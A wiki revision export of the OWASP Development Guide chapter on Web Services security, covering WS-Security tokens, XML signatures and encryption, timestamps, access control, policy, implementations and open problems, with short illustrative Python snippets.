&lt;br /&gt;
The WSS core specification also defines a general mechanism for referencing security tokens via the SecurityTokenReference element. An example of such an element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to practically any possible token type (including encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types: Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of the different token types.&lt;br /&gt;
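A Direct Reference of the form URI=&amp;quot;#aXhOJ5&amp;quot; simply names the element whose wsu:Id attribute carries the fragment value. The Python sketch below illustrates such a lookup; the cut-down envelope and the helper function are constructed for illustration only:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

# Fully qualified name of the wsu:Id attribute.
WSU_ID = ("{http://docs.oasis-open.org/wss/2004/01/"
          "oasis-200401-wss-wssecurity-utility-1.0.xsd}Id")

# Cut-down envelope for illustration only.
ENVELOPE = """\
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"
    xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
  <soap:Header>
    <wsse:Security>
      <wsse:BinarySecurityToken wsu:Id="aXhOJ5">MIICtzCCAi...</wsse:BinarySecurityToken>
    </wsse:Security>
  </soap:Header>
  <soap:Body wsu:Id="s91397860"/>
</soap:Envelope>
"""

def resolve_direct_reference(root: ET.Element, uri: str):
    # A Direct Reference URI "#x" names the element whose wsu:Id equals "x".
    target = uri.lstrip("#")
    for elem in root.iter():
        if elem.get(WSU_ID) == target:
            return elem
    return None

root = ET.fromstring(ENVELOPE)
token = resolve_direct_reference(root, "#aXhOJ5")
```

Note that the same scan works for any element type, which is precisely the schema-independence advantage of wsu:Id described above.&lt;br /&gt;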
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no enveloping or enveloped signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, the Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
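Why canonicalization matters can be shown with a toy digest computation: two semantically equivalent serializations of the same element hash to different values unless a canonical form is produced first. The snippet below is illustrative only; real implementations run C14N/EXC-C14N via an XML-security library before hashing:&lt;br /&gt;

```python
import base64
import hashlib

def digest_value(data: bytes) -> str:
    # DigestValue = Base64(SHA-1(octets of the transformed element))
    return base64.b64encode(hashlib.sha1(data).digest()).decode("ascii")

# Two semantically equivalent serializations of the same element:
form_a = b'<a xmlns="urn:x" attr="1"/>'
form_b = b'<a attr="1" xmlns="urn:x"></a>'

# Hashing the raw bytes treats them as different documents, which is exactly
# why a canonicalization transform must run before the digest is computed.
different = digest_value(form_a) != digest_value(form_b)
```

Without the canonicalization step, an intermediary that merely re-serialized the message would break every signature in it.&lt;br /&gt;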
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable to dereferencing a pointer to an object of a specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by the token profiles to accommodate specific token types. A typical signature example is shown in the earlier sample in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be prepended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message with overlapping signature and encryption blocks, as nothing in this case points to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and prepended to the security header in an &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
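The hybrid pattern just described (a fresh symmetric key encrypts the data; the recipient's key encrypts the symmetric key) can be sketched as follows. The XOR "cipher" below is emphatically not real cryptography; it is a toy stand-in for 3DES and RSA, used only to show the structure of EncryptedData plus EncryptedKey:&lt;br /&gt;

```python
import os

def toy_cipher(data: bytes, key: bytes) -> bytes:
    # NOT real cryptography: a symmetric XOR stand-in for 3DES/RSA,
    # chosen only because applying it twice with the same key decrypts.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

body = b"<po:PurchaseOrder>...</po:PurchaseOrder>"

session_key = os.urandom(16)                  # unique key for this message
cipher_value = toy_cipher(body, session_key)  # -> xenc:CipherValue in EncryptedData

recipient_key = os.urandom(16)                # stands in for the recipient's public key
encrypted_key = toy_cipher(session_key, recipient_key)  # -> xenc:EncryptedKey

# Receiver side: recover the session key first, then decrypt the body.
recovered_key = toy_cipher(encrypted_key, recipient_key)
recovered_body = toy_cipher(cipher_value, recovered_key)
```

The two-step structure is the point: the bulky payload is processed with a cheap symmetric algorithm, while the expensive public-key operation touches only the short session key.&lt;br /&gt;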
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP message freshness is addressed via a timestamp mechanism: each security header may contain just one such element, which states, in UTC format, the creation and expiration moments of the security header. It is important to realize that the timestamp applies to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach: once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change to the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address the clock synchronization issue (which, as was already pointed out earlier, is generally not an issue in modern-day systems); this has to be addressed out-of-band as far as the WSS mechanics are concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
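A receiver's freshness check can be sketched as follows; the helper name and the five-minute skew allowance are illustrative choices, not mandated by the specification:&lt;br /&gt;

```python
from datetime import datetime, timedelta, timezone

def timestamp_is_fresh(created: str, expires: str, skew_seconds: int = 300) -> bool:
    # Parse wsu:Created / wsu:Expires ("Z"-suffixed UTC) and compare against
    # the current time, tolerating a small clock skew in either direction.
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    created_t = datetime.strptime(created, fmt).replace(tzinfo=timezone.utc)
    expires_t = datetime.strptime(expires, fmt).replace(tzinfo=timezone.utc)
    now = datetime.now(timezone.utc)
    skew = timedelta(seconds=skew_seconds)
    return created_t - skew <= now <= expires_t + skew

# The sample timestamp from 2005 has long expired:
stale = timestamp_is_fresh("2005-01-27T16:46:10Z", "2005-01-27T18:46:10Z")
```

The skew window is the out-of-band concession mentioned above: it trades a slightly longer replay window for tolerance of imperfectly synchronized clocks.&lt;br /&gt;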
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication comes in two flavors: credentials verification and token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanisms for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who he claims to be are completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks them against the backend user store, or extracts the subject name from the X.509 certificate used to sign the message, verifies the certificate chain, and looks up the user in its store: at the moment, there are no requirements or standards which would dictate that it be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific; it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define the Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standard. In the Windows universe it happens in a similar fashion, since IIS executes its access checks on incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient detail to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms for determining the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply the appropriate measures of message protection when constructing requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types; the one for security is WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via the trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, neither the WS-Policy nor the WS-Trust specification has been submitted for standardization to a public body, and their development is progressing via the private collaboration of several companies, although it has been opened up to other participants as well. On the positive side, several interoperability events have been conducted for these specifications, so the development process of these critical links in the Web Services security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is the theory. In practice, there are many obstacles hidden along the way, and one of the major ones is security: concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction: incompatible authentication and authorization models for users, the degree of trust between the services themselves and the ways of establishing such trust, maintaining secure connections, and synchronizing user directories or otherwise exchanging users’ attributes. These issues are briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained for the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as user populations tend to change frequently across domains. So, how does a service in domain B decide whether to trust a user’s claim that he has already been authenticated in domain A? There are different aspects to this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means) and that authentication tokens from one domain are acceptable in the other. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for the user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and merely the fact that a user with a certain ID has successfully authenticated in another domain is communicated, as would be the case with several large corporations that would like to form a partnership but are reluctant to share customer details. The decision to accept such a request is then based on inter-domain procedures establishing special trust relationships and allowing the exchange of such opaque tokens, which would be an example of a Federation relationship. Of those efforts, the most notable example is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most of the existing deployments are proof-of-concept or internal pilot projects rather than real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations that will assess conformance of the incoming SOAP messages to the applicable standards, as well as appropriately secure the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to incorporate them immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what will happen when .NET 2.0 finally sees the light of day. The next release of WSE, 3.0, will coincide with the VS.2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area, and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service and interoperability is a requirement (which is usually the case), then in addition to the questions of security testing, one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle the WS-Security and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said, the WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in version 1.5 is limited to an implementation of the core WSS standard with the username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the tools necessary to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, checking signatures, tokens, etc., before passing them on to the target Web Service. When applied to outgoing SOAP messages, they act as a proxy, altering the messages to decorate them with the required security elements and to sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on back-end user and policy stores to view the credentials extracted from the WSS header from a broader perspective. An example of such a system is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold and allow for real-time processing of huge documents, decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of these systems – in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come at a price, however – the performance and simplicity hold only as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which presumably reduces risk through an exhaustive review and comment process, some error scenarios still slip in periodically, as no theory can possibly match the testing that results from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from the public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with the LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the existing back-end software infrastructure – at least, not without making performance sacrifices. Another consideration in deciding whether hardware-based systems are the right solution is that they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex and have a very steep learning curve associated with them. Most of the current products dealing with Web Service security suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the technologies involved, especially as the errors that end users see most of the time have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying administrators with ready-for-deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have the XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since the PKI mechanism has a lot of well-documented deployment and usability issues. Systems that opt to use homegrown mechanisms for key management run significant risks, since the questions of storing, updating, and recovering secret and private keys are, more often than not, inadequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59467</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59467"/>
				<updated>2009-04-26T11:54:06Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Security header’s structure */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web Services developers, and methods to address them. Due to space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and to warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical, seeing them as nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Let's assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format: one that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
